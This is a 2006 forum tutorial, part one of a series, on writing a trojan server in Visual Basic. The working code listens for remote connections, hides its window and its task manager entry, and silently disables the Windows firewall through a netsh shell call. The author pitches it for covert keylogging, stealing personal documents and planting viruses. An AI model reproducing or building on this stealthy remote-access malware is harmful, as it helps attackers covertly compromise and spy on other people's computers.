Posted: Fri Jun 30, 2006 1:10 pm Post subject: Basic VB Trojan Part 1 - Server Design & Source
A trojan (as explained in previous articles) is a remote communication utility. By this I mean there will be 2 or more applications communicating with eachother over a network, whether that be LAN or Internet.
To do this in visual basic we use whats called the “winsock”. This is a socket control function for VB.
So start up VB and create a new standard exe.
Were going to first make the server and follow it up by making the client.
As we are making the server we don’t actually need a GUI and we want to make it slightly stealthy.
Were going to make it invisible to the task manager, and invisible to the naked eye, and also either disable the windows default firewall or add itself to the exceptions list
BUT before we do all that we need to add a socket control so go ahead and press ctrl+T then make sure the Windows Winsock Control is checked. Apply that and click ok. Now you’ve got an icon with 2 little computers connected in your toolbar. Click on that and place one on your form.
Name this socket control “WS_server”
Right now for some code. We want it so that when the server boots up it starts listening for incoming connections.
Private Sub Form_Load() ‘ Form is loading DUH!!! WS_server.Close [color=green] ‘ This will close all current connections if they already exist WS_server.LocalPort = "1234" ‘ Tells the server to listen to port 1234 (might want to change this) WS_server.Listen ‘ Finally we tell the server to just wait and monitor this port. End Sub
There ya go, you’ve successfully managed to boot your server and get it to listen for incoming connections on port 1234.
Oh I forgot to mention your servers listening, but it doesn’t know what to do when something happens. So we are going to need to make the server respond and accept a connection when it is requested.
Private Sub WS_server_ConnectionRequest(ByVal requestID As Long)‘ Obvious WS_server.Close ‘ Closes any current connections WS_server.Accept requestID ‘ Accepts the connection. End Sub
Congrats your now hooked up and listening to a remote client. Now heres where the fun stuff comes into it. The devious little tricks you can perform, installing key loggers, adding windows profiles, download personal documents, upload virii even open and close the CD tray the skys the limit with what you want to achieve.
To do this we need to make a list of commands that the server knows how to carry out. So when the client sends the server a command, the server knows exactly what to do, and does it.
Private Sub WS_server_DataArrival(ByVal bytesTotal As Long)
If Data = "hellomessage" Then ‘ If the incoming data is “hellomessage” then perform the following MsgBox "WASSAP!!!!!!!"‘ Display a message saying WASSAP!!!!!!! End If End Sub
Well done, our first remote command is in place. It’s a simple command but its just to explain the theory behind this. Il run into more complex code that can help the server obtain important information later on.
Now our servers operational. But its extremely visible to the naked eye and the task manager. Adding this code will solve that
Private Sub Form_Load() ‘ Form is loading DUH!!! Me.Visible = False‘ Makes the form invisible App.TaskVisible = False ‘ Makes the file invisible in the task manager WS_server.Close WS_server.LocalPort = "1234"
WS_server.Listen
End Sub
Now your server is complete . Try modifying the code and don’t be a script kiddie. This is a basic VB Trojan and can be modified easily. For arguments sake one idea I have in my head right now is how to bypass the windows firewall before the Trojan accesses the internet. In XP if an app tries to access the net it gives you the option to block it.
I know that the DOS command is
“c:\Netsh firewall set opmode disable”
So id want to disable the firewall before the server tried accessing the internet.
Dim taskID As Double
taskID = Shell("C:\winnt\system32\cmd /C netsh firewall set opmode disable", 0)
The code for that would be written befor the server established itself to port 1234.
Play about with it a bit.
My next article will be about how to make the client.
Hope you enjoyed it, please leave feedback as it is nice for people who write these tutorials to hear what the public think, whether you understand them or not etc etc.
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
so go ahead and press ctrl+T then make sure the Windows Winsock Control is checked. Apply that and click ok. Now you’ve got an icon with 2 little computers connected in your toolbar. Click on that and place one on your form.